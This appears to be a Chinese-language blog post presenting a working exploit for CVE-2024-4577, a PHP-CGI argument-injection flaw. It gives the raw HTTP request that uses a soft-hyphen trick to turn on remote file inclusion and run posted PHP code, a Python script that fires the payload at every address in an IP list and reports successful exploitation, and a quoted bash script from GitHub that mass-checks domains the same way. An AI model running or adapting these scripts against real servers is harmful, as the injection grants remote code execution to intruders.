參考:https://www.ddosi.org/cve-2024-4577/
http包👇
POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 21
User-Agent: curl/8.3.0
Accept: */*
Content-Length: 21
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
<?php
phpinfo();
?>
編寫exp.py👇
'''
EXP
of
PHP RCE CVE-2024-4577
'''
if __name__=='__main__':
print('我開始啦')
import requests
import re
import json
###############👇
path=r"D:\phpstudy_pro\WWW\UPLOAD\py\CVE-2024-4577\IP-list.txt" #地址列表檔案位置
###############👆
#pattern = r'\{.*\}'
pattern = r"<h1 class=\"p\">PHP Version"
#初始化地址列表
def addstr(url):
url_tail=r'/test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input'
def add_http_header(url):
if not url.startswith('http://'):
url = 'http://' + url
return url
def delxiegang(url):
if url.endswith('/'):
url=url[:-1]
return url
def addxiegang(url):
if not url.endswith('/'):
url =url+'/'
return url
http_url= add_http_header(url)
final_url=delxiegang(http_url)+url_tail
return final_url
address_list=[]
#讀取地址列表👇
with open(path,'r',encoding='utf-8') as file:
for line in file:
address_list.append(addstr(line.replace("\n", "")))
print(address_list)
def send_poc(url):
url=url
headers = {
"User-Agent": "curl/8.3.0",
"Accept": "*/*",
"Content-Type": "application/x-www-form-urlencoded",
"Connection": "keep-alive"
}
data = "<?php phpinfo(); ?>"
try:
response = requests.post(url, headers=headers, data=data)
response.encoding='utf-8'
response_text=response.text
matches = re.findall(pattern, response_text)
if matches:
print("#利用成功!!!!!!!!!!!!!!!!!!!,url:", url)
else:
print("@未找到匹配項。", url)
except:
print("@發生了一個錯誤", url)
pass
#傳送poc👆
#print(response.text)
#check php_info👇
for address_url in address_list:
send_poc(address_url)
我寫完這個py指令碼才發現github上已經有人寫了bash指令碼,思路差不多一樣👇
https://github.com/11whoami99/CVE-2024-4577/blob/main/CVE-2024-4577.sh
#!/bin/bash
# Function to check vulnerability for a domain
check_vulnerability() {
local domain=$1
local response=$(curl -s -X POST "${domain}/test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" \
-H "User-Agent: curl/8.3.0" \
-H "Accept: */*" \
-H "Content-Length: 23" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Connection: keep-alive" \
--data "<?php phpinfo(); ?>" \
--max-time 10)
if [[ $response == *"PHP Version"* ]]; then
echo "$domain: Vulnerable"
fi
}
# Main function to iterate over domains
main() {
local file=$1
while IFS= read -r domain || [ -n "$domain" ]; do
check_vulnerability "$domain"
done < "$file"
}
# Check if the file argument is provided
if [ "$#" -ne 1 ]; then
echo "Usage: $0 <domain_list_file>"
exit 1
fi
# Call the main function with the domain list file
main "$1"
正則和他的萬用字元匹配的字串都一樣,挺巧的.